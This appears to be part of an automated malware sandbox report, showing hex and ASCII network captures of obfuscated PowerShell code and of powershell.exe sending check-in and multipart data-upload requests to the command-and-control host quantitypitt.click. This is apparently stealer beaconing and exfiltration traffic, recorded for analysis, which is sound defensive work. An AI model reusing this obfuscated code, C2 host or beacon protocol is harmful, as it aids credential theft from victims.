                                                                                                  2025-01-06 12:55:18 UTC1369INData Raw: 36 34 37 34 30 29 29 20 2d 20 28 28 2d 38 35 39 38 20 2a 20 2d 39 33 32 29 20 2d 20 24 7a 43 49 55 6a 55 55 42 59 29 29 0d 0a 20 20 20 20 20 20 7d 0d 0a 24 44 4c 45 50 4f 4f 4b 6f 59 57 2d 2d 0d 0a 7d 0d 0a 24 6c 66 7a 68 6e 4f 42 4a 5a 20 3d 20 28 28 28 28 32 39 38 20 2a 20 2d 34 34 29 20 2a 20 36 29 29 20 2d 20 28 28 28 28 24 5a 6f 6d 77 5a 6f 20 2d 20 2d 36 36 31 37 31 38 29 20 2a 20 24 4a 4f 44 72 72 75 29 29 20 2d 20 28 28 28 28 28 28 24 6a 7a 79 6a 58 58 61 6c 59 20 2d 20 33 39 36 29 20 2a 20 24 41 75 51 64 42 48 67 5a 6b 29 20 2d 20 24 67 68 66 64 72 6f 66 29 20 2a 20 37 32 36 35 39 39 29 29 20 2d 20 28 28 28 28 24 6e 6e 73 6c 73 6c 42 53 67 20 2b 20 24 4a 4f 44 72 72 75 29 20 2d 20 39 34 38 31 35 29 20 2b 20 39 29 20 2d 20 24 56 41 78 50 51 48 29
                                                                                                  Data Ascii: 64740)) - ((-8598 * -932) - $zCIUjUUBY)) }$DLEPOOKoYW--}$lfzhnOBJZ = ((((298 * -44) * 6)) - (((($ZomwZo - -661718) * $JODrru)) - (((((($jzyjXXalY - 396) * $AuQdBHgZk) - $ghfdrof) * 726599)) - (((($nnslslBSg + $JODrru) - 94815) + 9) - $VAxPQH)
                                                                                                  2025-01-06 12:55:18 UTC1369INData Raw: 48 48 77 29 20 2d 61 6e 64 20 28 2d 36 38 20 2d 6c 74 20 24 62 68 63 78 7a 63 5a 29 20 2d 61 6e 64 20 28 24 79 64 6f 54 57 6b 66 48 20 2d 6c 65 20 36 33 37 35 29 29 20 7b 0d 0a 20 20 20 20 24 59 51 55 69 6d 48 48 77 20 3d 20 28 28 24 7a 64 54 6d 50 43 69 64 6a 45 20 2d 20 28 28 28 24 62 68 63 78 7a 63 5a 20 2b 20 28 28 28 28 2d 39 33 20 2b 20 32 32 38 29 20 2d 20 2d 37 37 29 20 2a 20 2d 38 30 29 29 29 20 2a 20 36 38 36 35 30 29 29 29 20 2d 20 24 6a 7a 79 6a 58 58 61 6c 59 29 0d 0a 7d 0d 0a 24 47 79 45 52 64 68 42 72 6f 20 3d 20 35 0d 0a 77 68 69 6c 65 20 28 24 47 79 45 52 64 68 42 72 6f 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 31 35 33 38 31 20 2d 67 65 20 32 36 29 20 2d 61 6e 64 20 28 24 59 51 55 69 6d 48 48 77 20 2d 67 74 20
                                                                                                  Data Ascii: HHw) -and (-68 -lt $bhcxzcZ) -and ($ydoTWkfH -le 6375)) { $YQUimHHw = (($zdTmPCidjE - ((($bhcxzcZ + ((((-93 + 228) - -77) * -80))) * 68650))) - $jzyjXXalY)}$GyERdhBro = 5while ($GyERdhBro -gt 0) { if ((15381 -ge 26) -and ($YQUimHHw -gt
                                                                                                  2025-01-06 12:55:18 UTC1369INData Raw: 6f 66 70 6c 68 4e 66 29 29 29 20 2d 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2a 20 24 51 6f 66 70 6c 68 4e 66 29 0d 0a 24 4f 68 56 47 73 6e 20 3d 20 28 28 28 28 28 28 28 38 38 33 30 36 20 2a 20 38 38 39 36 39 32 29 20 2b 20 24 57 54 79 63 6a 62 51 4f 65 29 20 2d 20 28 28 28 28 24 7a 43 49 55 6a 55 55 42 59 20 2d 20 24 5a 46 51 72 71 73 48 53 69 46 4d 29 20 2b 20 35 38 32 32 38 29 20 2a 20 2d 33 36 33 29 29 29 20 2b 20 24 79 64 6f 54 57 6b 66 48 29 20 2d 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 29 20 2d 20 28 28 28 28 28 2d 35 36 39 34 20 2a 20 32 36 30 29 20 2b 20 24 47 67 6a 64 54 56 54 4e 50 63 29 20 2a 20 33 35 33 29 29 20 2a 20 28 28 24 6e 46 43 67 72 43 71 49 45 4e 76 20 2d 20 2d 32 34 33 39 38 38 29 20 2a 20 24 6c 66 7a 68 6e 4f 42 4a 5a 29 29 29 0d 0a 69
                                                                                                  Data Ascii: ofplhNf))) - $KVHojVRko) * $QofplhNf)$OhVGsn = (((((((88306 * 889692) + $WTycjbQOe) - (((($zCIUjUUBY - $ZFQrqsHSiFM) + 58228) * -363))) + $ydoTWkfH) - $KVHojVRko)) - (((((-5694 * 260) + $GgjdTVTNPc) * 353)) * (($nFCgrCqIENv - -243988) * $lfzhnOBJZ)))i
                                                                                                  2025-01-06 12:55:18 UTC1183INData Raw: 73 6c 42 53 67 29 29 20 2d 20 28 28 28 30 20 2d 20 24 6c 66 7a 68 6e 4f 42 4a 5a 29 20 2b 20 28 28 28 28 28 28 24 62 68 63 78 7a 63 5a 20 2b 20 24 58 72 56 4b 4c 4a 29 20 2b 20 2d 36 32 36 29 20 2b 20 36 39 36 33 39 38 29 20 2d 20 2d 36 36 36 36 34 33 29 20 2a 20 2d 31 36 29 29 29 20 2a 20 28 28 28 24 46 4b 75 76 62 58 5a 4f 45 76 5a 20 2b 20 24 61 4e 70 54 6e 63 6a 76 61 70 4a 29 20 2b 20 36 37 37 35 33 29 29 29 29 0d 0a 7d 0d 0a 24 6c 53 45 66 72 44 46 77 20 3d 20 34 0d 0a 77 68 69 6c 65 20 28 24 6c 53 45 66 72 44 46 77 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 28 2d 32 39 34 39 32 30 20 2d 6c 74 20 24 4c 6b 56 48 53 56 73 46 6b 68 29 20 2d 6f 72 20 28 24 5a 46 51 72 71 73 48 53 69 46 4d 20 2d 6c 65 20 2d 33 30 34 29 20 2d 6f
                                                                                                  Data Ascii: slBSg)) - (((0 - $lfzhnOBJZ) + (((((($bhcxzcZ + $XrVKLJ) + -626) + 696398) - -666643) * -16))) * ((($FKuvbXZOEvZ + $aNpTncjvapJ) + 67753))))}$lSEfrDFw = 4while ($lSEfrDFw -gt 0) { if ((-294920 -lt $LkVHSVsFkh) -or ($ZFQrqsHSiFM -le -304) -o


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449953104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:30 UTC265OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 8
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                  Data Ascii: act=life
                                                                                                  2025-01-06 12:56:31 UTC1129INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:31 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=j1p2bj2me71557cirhhnul0vfa; expires=Fri, 02 May 2025 06:43:10 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trZ7KnxYVCFTmOS6GNqYjWf5%2FriZbRA44LHhlBDYuy8Lel9wD69X47LFvk3d%2FJP9YzPgiyB4cinZ%2F6osRauCbrd6NLM%2BXUgZBcxtmxMBZlLcUmseUTlJvrDaRBMWSCkVqyENtdw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbde59fe0743dd-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1595&rtt_var=605&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1800246&cwnd=196&unsent_bytes=0&cid=91ecedc415885e97&ts=451&x=0"
                                                                                                  2025-01-06 12:56:31 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                  Data Ascii: 2ok
                                                                                                  2025-01-06 12:56:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.449960104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:31 UTC266OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 77
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:31 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 61 4e 4c 6a 2d 2d 72 65 34 26 6a 3d 32 63 37 62 33 34 39 62 38 63 66 33 30 32 30 33 64 39 35 65 61 66 38 66 32 64 38 66 34 37 31 30
                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=yJaNLj--re4&j=2c7b349b8cf30203d95eaf8f2d8f4710
                                                                                                  2025-01-06 12:56:32 UTC1127INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 06 Jan 2025 12:56:32 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=fidcsulsphiv66fas8j442cb3q; expires=Fri, 02 May 2025 06:43:11 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bkh45H97vkO4QWGxAweZi8bKmZsQOBap5SAZyIR3H0Nc1LtOAVRn9bzSL9e9%2BIfYWXdxPHEZVQUFqK%2FTdJ4T1VYdTkNoYNMZmK8h63cOGVoUokuonsHiaj%2Bt7jlTSXCGdeUqzVU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fdbde5fbf157d06-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1964&rtt_var=748&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=979&delivery_rate=1452013&cwnd=244&unsent_bytes=0&cid=fe1c3ca897733cca&ts=489&x=0"
                                                                                                  2025-01-06 12:56:32 UTC242INData Raw: 31 63 63 66 0d 0a 70 75 58 57 66 31 4c 6e 7a 73 30 75 63 45 6e 52 37 56 44 66 4c 48 2f 30 42 73 44 66 71 74 45 4e 34 45 43 31 62 49 7a 49 33 45 33 64 78 36 42 64 61 4e 50 69 37 31 30 56 61 2b 75 5a 49 71 70 4a 55 39 5a 6e 70 50 32 51 74 32 79 4d 4d 39 42 41 72 72 36 78 62 35 79 44 74 78 4d 68 67 75 4c 76 53 77 68 72 36 37 59 72 2f 55 6b 52 31 6a 7a 69 75 73 43 7a 62 49 77 69 31 41 66 6a 75 4c 41 75 7a 6f 6d 78 46 7a 65 45 71 71 78 43 48 53 79 30 69 44 47 31 51 68 61 5a 62 71 33 39 68 76 4e 6f 6d 6d 4b 50 54 73 47 74 71 43 7a 72 68 4b 55 55 63 4a 72 69 74 67 77 56 4a 2f 50 58 63 72 35 4a 48 5a 68 67 70 4c 54 43 75 57 57 45 49 39 45 47 2f 4b 47 36 4a 63 36 48 73 68 59 39 6a 62 36 68 53 42 6f 6e 73 6f 49 78 2f 51 42 64
                                                                                                  Data Ascii: 1ccfpuXWf1Lnzs0ucEnR7VDfLH/0BsDfqtEN4EC1bIzI3E3dx6BdaNPi710Va+uZIqpJU9ZnpP2Qt2yMM9BArr6xb5yDtxMhguLvSwhr67Yr/UkR1jziusCzbIwi1AfjuLAuzomxFzeEqqxCHSy0iDG1QhaZbq39hvNommKPTsGtqCzrhKUUcJritgwVJ/PXcr5JHZhgpLTCuWWEI9EG/KG6Jc6HshY9jb6hSBonsoIx/QBd
                                                                                                  2025-01-06 12:56:32 UTC1369INData Raw: 6b 58 7a 69 35 59 6a 67 58 59 45 7a 78 68 76 6a 75 72 68 76 32 38 6d 74 58 54 65 4a 37 50 63 4d 47 69 65 39 69 6a 47 79 53 52 79 57 64 71 32 39 79 37 74 6e 68 69 6a 59 41 65 47 6b 74 43 6a 4d 6a 72 4d 53 4e 34 32 71 6f 45 39 53 5a 66 4f 49 4b 76 30 57 58 62 5a 30 6f 62 37 63 76 6e 37 43 50 5a 6b 58 72 71 32 79 62 35 7a 48 73 68 4d 78 69 4b 79 39 52 42 6b 67 74 70 30 35 74 45 4d 51 6c 6d 6d 6f 73 73 75 7a 61 49 67 6f 32 41 54 71 70 37 4d 70 78 49 66 30 55 33 43 43 74 4f 38 55 55 67 69 32 6e 7a 57 78 57 46 2b 73 4a 4c 33 7a 30 66 4e 6f 6a 6d 4b 50 54 75 61 76 76 53 7a 50 69 4c 63 56 4f 35 65 73 76 55 6f 66 4c 71 47 4a 4e 37 4e 45 48 6f 52 75 72 4c 76 4c 75 6d 53 4c 4a 39 41 4b 72 75 54 2b 4b 4e 7a 48 37 46 30 52 69 4b 65 6a 52 67 55 72 38 35 42 38 70 41 34
                                                                                                  Data Ascii: kXzi5YjgXYEzxhvjurhv28mtXTeJ7PcMGie9ijGySRyWdq29y7tnhijYAeGktCjMjrMSN42qoE9SZfOIKv0WXbZ0ob7cvn7CPZkXrq2yb5zHshMxiKy9RBkgtp05tEMQlmmossuzaIgo2ATqp7MpxIf0U3CCtO8UUgi2nzWxWF+sJL3z0fNojmKPTuavvSzPiLcVO5esvUofLqGJN7NEHoRurLvLumSLJ9AKruT+KNzH7F0RiKejRgUr85B8pA4
                                                                                                  2025-01-06 12:56:32 UTC1369INData Raw: 4c 76 48 76 6d 50 43 62 4a 63 4a 39 75 72 6d 62 2b 36 45 6f 42 34 36 78 35 6d 73 51 68 77 73 70 63 38 74 38 31 64 64 6b 57 6a 69 35 59 69 2b 62 6f 6f 6b 78 51 48 6a 71 62 41 68 79 34 4b 37 46 54 43 46 6f 61 70 49 47 53 43 77 67 6a 61 76 52 42 32 65 59 61 4f 33 77 76 4d 68 77 69 58 50 54 72 62 71 6a 7a 6a 50 78 59 45 65 50 6f 75 72 75 51 77 4e 5a 61 72 50 4e 62 45 4f 52 64 5a 70 71 72 6a 4e 76 47 36 49 4c 4e 49 45 34 71 4b 77 4c 4e 61 49 73 42 30 38 6a 61 61 69 51 68 59 6a 75 6f 51 35 75 30 34 63 6e 43 54 73 2f 63 2b 72 4c 39 70 69 34 77 6e 69 70 37 46 74 38 59 53 36 45 7a 65 54 37 4c 41 43 43 32 75 30 67 33 4c 6c 44 68 47 66 5a 4b 6d 33 7a 4c 4e 6f 6a 79 66 55 43 65 32 6e 75 53 58 4b 67 4c 41 52 4f 59 69 71 72 30 73 57 4c 71 47 4b 4f 37 46 43 58 64 67 6b
                                                                                                  Data Ascii: LvHvmPCbJcJ9urmb+6EoB46x5msQhwspc8t81ddkWji5Yi+bookxQHjqbAhy4K7FTCFoapIGSCwgjavRB2eYaO3wvMhwiXPTrbqjzjPxYEePouruQwNZarPNbEORdZpqrjNvG6ILNIE4qKwLNaIsB08jaaiQhYjuoQ5u04cnCTs/c+rL9pi4wnip7Ft8YS6EzeT7LACC2u0g3LlDhGfZKm3zLNojyfUCe2nuSXKgLAROYiqr0sWLqGKO7FCXdgk
                                                                                                  2025-01-06 12:56:32 UTC1369INData Raw: 31 32 77 69 58 62 54 72 62 71 74 79 62 57 69 62 6f 55 50 59 4f 6b 71 45 49 66 49 4c 57 45 4e 62 70 49 45 4a 35 70 70 37 37 4a 74 32 57 51 49 64 77 45 34 36 44 2b 59 59 53 41 72 46 31 6f 78 59 75 6a 5a 51 49 77 6f 5a 6c 79 6f 67 41 45 31 6d 4f 75 2f 5a 44 7a 62 49 30 72 32 41 62 6d 70 62 45 72 79 6f 47 79 45 44 57 4b 70 72 31 45 48 43 61 34 67 44 6d 76 54 68 43 53 61 4b 61 31 77 37 6b 76 7a 47 4c 51 46 71 37 79 2f 68 72 4a 69 4c 51 65 4a 73 57 7a 34 56 56 53 4c 4c 2f 50 61 76 31 43 45 35 5a 72 72 72 48 44 75 32 36 4f 4c 4e 41 4c 35 36 4b 32 50 63 57 44 76 42 77 2b 69 71 32 72 53 52 63 76 74 49 73 30 73 67 35 54 31 6d 4f 36 2f 5a 44 7a 51 4b 55 58 6c 53 2f 55 36 71 46 68 33 63 65 7a 45 58 44 64 37 4b 4e 50 48 69 4f 38 69 54 75 78 52 42 53 64 61 4b 6d 35 78
                                                                                                  Data Ascii: 12wiXbTrbqtybWiboUPYOkqEIfILWENbpIEJ5pp77Jt2WQIdwE46D+YYSArF1oxYujZQIwoZlyogAE1mOu/ZDzbI0r2AbmpbEryoGyEDWKpr1EHCa4gDmvThCSaKa1w7kvzGLQFq7y/hrJiLQeJsWz4VVSLL/Pav1CE5ZrrrHDu26OLNAL56K2PcWDvBw+iq2rSRcvtIs0sg5T1mO6/ZDzQKUXlS/U6qFh3cezEXDd7KNPHiO8iTuxRBSdaKm5x
                                                                                                  2025-01-06 12:56:32 UTC1369INData Raw: 74 31 67 2f 6f 75 4c 6b 6d 31 6f 6d 35 45 6a 69 4e 70 61 35 49 46 79 61 31 67 7a 69 38 53 52 4f 59 62 4f 4c 7a 69 4c 52 33 77 6e 71 58 4c 2f 36 78 72 44 6e 4a 70 72 6b 53 63 4a 72 69 74 67 77 56 4a 2f 50 58 63 72 52 63 47 5a 74 32 71 37 72 47 76 47 79 51 49 39 6f 46 2f 4b 32 78 4b 38 4f 4c 73 68 49 32 68 4b 6d 6c 51 42 55 75 75 49 41 2b 2f 51 42 64 6b 58 7a 69 35 59 69 64 5a 4a 45 31 31 41 44 6c 76 4b 56 76 32 38 6d 74 58 54 65 4a 37 50 63 4d 45 53 43 34 69 7a 4b 78 54 68 6d 62 5a 4c 43 79 7a 37 52 6d 69 54 44 64 43 65 6d 68 74 69 54 4c 67 61 59 52 50 70 65 70 76 56 35 53 5a 66 4f 49 4b 76 30 57 58 61 42 6a 73 71 33 4c 38 56 36 55 49 63 45 46 34 36 62 2b 4d 49 71 65 39 42 6f 38 78 66 54 76 53 68 30 69 73 49 41 7a 74 45 49 51 6b 32 32 6e 76 4d 36 33 5a 59
                                                                                                  Data Ascii: t1g/ouLkm1om5EjiNpa5IFya1gzi8SROYbOLziLR3wnqXL/6xrDnJprkScJritgwVJ/PXcrRcGZt2q7rGvGyQI9oF/K2xK8OLshI2hKmlQBUuuIA+/QBdkXzi5YidZJE11ADlvKVv28mtXTeJ7PcMESC4izKxThmbZLCyz7RmiTDdCemhtiTLgaYRPpepvV5SZfOIKv0WXaBjsq3L8V6UIcEF46b+MIqe9Bo8xfTvSh0isIAztEIQk22nvM63ZY
                                                                                                  2025-01-06 12:56:32 UTC1369INData Raw: 72 72 58 77 4e 6f 53 41 75 46 31 6f 78 61 2b 6f 54 78 4d 68 75 6f 4d 39 75 6b 6f 50 6e 47 4f 77 76 4d 6d 34 59 6f 34 69 32 67 50 6b 71 37 63 69 79 49 71 7a 47 6a 2b 41 37 4f 45 4d 46 54 50 7a 31 33 4b 63 51 78 61 61 50 2f 6a 39 31 2f 31 32 77 69 58 62 54 72 62 71 76 69 58 42 6a 62 6b 65 50 34 61 2b 72 6b 6f 41 4b 37 36 46 49 4c 64 46 47 4a 74 70 72 37 37 4f 74 57 53 4f 4d 4e 34 4f 37 61 48 2b 59 59 53 41 72 46 31 6f 78 59 2b 34 57 68 67 73 76 35 6b 35 76 45 30 4c 6d 33 54 69 38 34 69 69 61 4a 4e 69 6a 78 6a 2b 76 62 6b 77 69 70 37 30 47 6a 7a 46 39 4f 39 4b 47 79 32 30 69 54 79 76 53 78 75 5a 61 36 75 30 7a 4c 74 73 67 69 62 54 43 65 75 70 73 69 54 44 68 4c 73 5a 4f 59 75 6c 6f 41 78 63 61 37 53 58 63 75 55 4f 50 49 31 6e 72 72 43 49 72 43 47 62 59 74 41
                                                                                                  Data Ascii: rrXwNoSAuF1oxa+oTxMhuoM9ukoPnGOwvMm4Yo4i2gPkq7ciyIqzGj+A7OEMFTPz13KcQxaaP/j91/12wiXbTrbqviXBjbkeP4a+rkoAK76FILdFGJtpr77OtWSOMN4O7aH+YYSArF1oxY+4Whgsv5k5vE0Lm3Ti84iiaJNijxj+vbkwip70GjzF9O9KGy20iTyvSxuZa6u0zLtsgibTCeupsiTDhLsZOYuloAxca7SXcuUOPI1nrrCIrCGbYtA
                                                                                                  2025-01-06 12:56:32 UTC296INData Raw: 6d 2b 63 78 35 51 57 4a 6f 43 72 75 51 34 6e 4b 4c 32 42 4e 61 73 4f 41 71 6b 71 34 72 79 49 36 31 61 62 59 73 46 4f 74 76 6a 77 62 39 62 48 37 46 31 33 68 72 36 39 53 68 45 39 73 4d 67 4d 67 32 6b 4c 6e 47 4f 79 75 74 2b 38 4c 38 78 69 32 45 36 32 6b 2f 34 6d 77 35 79 6c 43 7a 32 56 71 2b 39 7a 58 47 75 72 7a 32 72 39 65 78 36 59 61 71 57 72 32 66 35 49 6c 43 6a 51 48 75 6d 39 73 57 2b 4b 78 37 4a 64 61 4e 62 69 37 30 67 44 61 2b 76 66 59 4f 59 62 54 73 45 30 38 4b 4b 47 71 69 2b 55 59 6f 39 63 6f 4f 71 73 62 35 7a 48 38 78 34 69 6c 36 71 73 57 68 46 73 6a 62 45 53 74 6b 49 65 6d 6d 57 6c 2f 59 62 7a 59 4d 4a 36 37 6b 37 74 75 4b 78 67 31 5a 47 35 44 54 66 4a 70 4c 35 42 48 6d 76 39 7a 33 36 35 52 52 47 54 59 37 4c 79 32 71 4e 6b 6a 6a 53 62 43 76 7a 71
                                                                                                  Data Ascii: m+cx5QWJoCruQ4nKL2BNasOAqkq4ryI61abYsFOtvjwb9bH7F13hr69ShE9sMgMg2kLnGOyut+8L8xi2E62k/4mw5ylCz2Vq+9zXGurz2r9ex6YaqWr2f5IlCjQHum9sW+Kx7JdaNbi70gDa+vfYOYbTsE08KKGqi+UYo9coOqsb5zH8x4il6qsWhFsjbEStkIemmWl/YbzYMJ67k7tuKxg1ZG5DTfJpL5BHmv9z365RRGTY7Ly2qNkjjSbCvzq
                                                                                                  2025-01-06 12:56:32 UTC1369INData Raw: 31 64 38 31 0d 0a 62 6f 62 75 6f 4c 4e 4b 41 2b 42 55 68 69 4b 44 76 63 31 78 72 71 38 39 71 2f 58 73 65 6d 47 71 6c 71 39 6e 2b 54 34 6b 75 31 41 4c 76 72 66 35 68 68 49 48 30 52 57 50 4c 37 4b 74 64 55 6e 50 6a 33 57 6e 6f 48 55 72 47 4e 72 33 7a 30 66 4e 35 77 6e 71 46 51 4b 36 34 2f 6e 65 45 77 4c 63 50 49 6f 4f 76 75 55 39 56 46 59 32 70 4d 61 78 45 50 4a 74 30 70 59 50 32 70 6d 79 4d 4c 4e 41 59 2f 2b 72 77 62 38 76 48 37 43 52 77 7a 65 43 70 54 77 52 72 6a 4d 46 79 70 51 35 46 31 6c 47 68 73 38 61 30 65 5a 4e 76 38 51 33 2f 6f 4a 38 69 31 49 44 30 55 33 43 44 37 50 63 66 58 47 75 33 6e 6e 4c 6c 48 6b 2f 4e 4d 66 48 71 6d 4f 46 77 7a 44 75 58 47 4b 37 79 37 47 47 45 6c 66 52 46 63 4d 4b 76 76 56 34 55 4b 4b 57 4d 64 59 4e 77 4f 35 56 6a 70 4c 37 47
                                                                                                  Data Ascii: 1d81bobuoLNKA+BUhiKDvc1xrq89q/XsemGqlq9n+T4ku1ALvrf5hhIH0RWPL7KtdUnPj3WnoHUrGNr3z0fN5wnqFQK64/neEwLcPIoOvuU9VFY2pMaxEPJt0pYP2pmyMLNAY/+rwb8vH7CRwzeCpTwRrjMFypQ5F1lGhs8a0eZNv8Q3/oJ8i1ID0U3CD7PcfXGu3nnLlHk/NMfHqmOFwzDuXGK7y7GGElfRFcMKvvV4UKKWMdYNwO5VjpL7G
                                                                                                  2025-01-06 12:56:32 UTC1369INData Raw: 62 51 51 63 36 36 73 7a 72 56 67 4b 52 64 66 73 57 67 37 78 52 53 4b 36 4f 4d 4a 72 6f 43 47 6f 78 6a 34 76 4f 49 76 53 2f 61 59 74 59 45 2f 71 65 78 4b 49 69 42 75 68 4e 77 6d 75 4b 32 44 41 52 72 36 39 78 38 2f 56 78 64 7a 69 54 6c 73 38 57 79 62 49 77 68 78 52 7a 6f 71 61 67 73 67 37 6d 4b 4f 69 4b 4f 72 65 31 2b 41 69 43 6e 6a 44 4f 6d 44 44 32 47 61 62 65 73 7a 36 4e 52 76 42 58 47 43 66 37 6f 6d 43 7a 53 68 50 52 54 63 4a 33 73 39 77 77 31 4f 62 69 4f 41 4b 31 46 43 5a 56 6c 75 5a 33 59 76 6e 71 54 4a 63 64 4f 38 65 53 6e 62 39 4c 48 37 45 35 2b 78 62 37 76 46 46 4a 73 76 59 49 7a 76 6b 41 65 68 48 61 6b 76 74 36 77 4b 4c 77 63 34 77 58 36 71 62 41 70 7a 37 6d 4b 4b 69 47 43 76 4f 31 71 45 54 32 77 7a 33 7a 39 56 6c 33 4f 4a 4a 61 32 33 4c 42 68 68
                                                                                                  Data Ascii: bQQc66szrVgKRdfsWg7xRSK6OMJroCGoxj4vOIvS/aYtYE/qexKIiBuhNwmuK2DARr69x8/VxdziTls8WybIwhxRzoqagsg7mKOiKOre1+AiCnjDOmDD2Gabesz6NRvBXGCf7omCzShPRTcJ3s9ww1ObiOAK1FCZVluZ3YvnqTJcdO8eSnb9LH7E5+xb7vFFJsvYIzvkAehHakvt6wKLwc4wX6qbApz7mKKiGCvO1qET2wz3z9Vl3OJJa23LBhh


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.449966104.21.43.2294431712C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-06 12:56:33 UTC275OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=8CD9VOT5V
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 18107
                                                                                                  Host: quantitypitt.click
                                                                                                  2025-01-06 12:56:33 UTC15331OUTData Raw: 2d 2d 38 43 44 39 56 4f 54 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 43 34 42 41 31 35 37 30 39 42 31 33 31 39 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 38 43 44 39 56 4f 54 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 43 44 39 56 4f 54 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 61 4e 4c 6a 2d 2d 72 65 34 0d 0a 2d 2d 38 43 44 39 56 4f 54 35 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                  Data Ascii: --8CD9VOT5VContent-Disposition: form-data; name="hwid"08C4BA15709B131985E74BC4E94691B5--8CD9VOT5VContent-Disposition: form-data; name="pid"2--8CD9VOT5VContent-Disposition: form-data; name="lid"yJaNLj--re4--8CD9VOT5VContent-Dispos
